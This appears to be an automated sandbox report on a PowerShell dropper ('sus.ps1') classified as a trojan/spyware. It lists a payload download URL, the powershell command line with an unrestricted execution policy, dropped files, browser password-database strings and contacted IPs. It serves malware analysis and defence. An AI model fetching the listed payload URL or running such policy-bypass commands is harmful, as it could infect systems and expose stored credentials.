Source: powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2436521329.000001E41AF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jerseysurffilmfestival.com
Source: powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2436521329.000001E41AF32000.00000004.00000800.00020000.00000000.sdmp, sus.ps1	String found in binary or memory: https://jerseysurffilmfestival.com/wakena.zip
Source: powershell.exe, 00000001.00000002.2456915849.000001E42995F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bubs.exe, 00000003.00000003.2351606017.0000000004257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: bubs.exe, 00000003.00000003.2351606017.0000000004257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: bubs.exe, 00000003.00000003.2351479043.0000000003F70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: bubs.exe, 00000003.00000003.2351479043.0000000003F70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: bubs.exe, 00000003.00000003.2351606017.0000000004257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: bubs.exe, 00000003.00000003.2351606017.0000000004257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: bubs.exe, 00000003.00000003.2351606017.0000000004257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855

Source: unknown	HTTPS traffic detected: 185.61.154.28:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49855 version: TLS 1.2

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Extra\bubs.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Extra\cr.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C4D12	1_2_00007FFD348C4D12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C4DFB	1_2_00007FFD348C4DFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C3C1D	1_2_00007FFD348C3C1D
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Code function: 3_2_002D1000	3_2_002D1000
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Code function: 3_2_6C531D18	3_2_6C531D18

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@4/9@3/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Extra

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wlnyof2.wcz.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: bubs.exe, 00000003.00000003.2337422984.0000000003F5B000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2338286492.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326044646.0000000003F6A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sus.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Extra\bubs.exe "C:\Users\user\AppData\Roaming\Extra\bubs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Extra\bubs.exe "C:\Users\user\AppData\Roaming\Extra\bubs.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: t2embed.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: cr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: t2embed.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: cr.dll.1.dr	Static PE information: real checksum: 0x57c61b should be: 0x57c618
Source: bubs.exe.1.dr	Static PE information: real checksum: 0x48fa29 should be: 0x48fa25

Source: cr.dll.1.dr	Static PE information: section name: .eh_fram
Source: bubs.exe.1.dr	Static PE information: section name: .eh_fram

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C7C5E push eax; retf	1_2_00007FFD348C7C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348CF5CD push E85A869Ch; ret	1_2_00007FFD348CF5F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C782E pushad ; iretd	1_2_00007FFD348C785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C0953 push E95A87D0h; ret	1_2_00007FFD348C09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C785E push eax; iretd	1_2_00007FFD348C786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C09FA push E95A87D0h; ret	1_2_00007FFD348C09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C09CA push E85D5D5Dh; ret	1_2_00007FFD348C09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C4B32 push eax; retf	1_2_00007FFD348C4B91
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C4BFA pushad ; iretd	1_2_00007FFD348C4C01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD348C7C2E pushad ; retf	1_2_00007FFD348C7C5D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Extra\bubs.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Extra\cr.dll			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
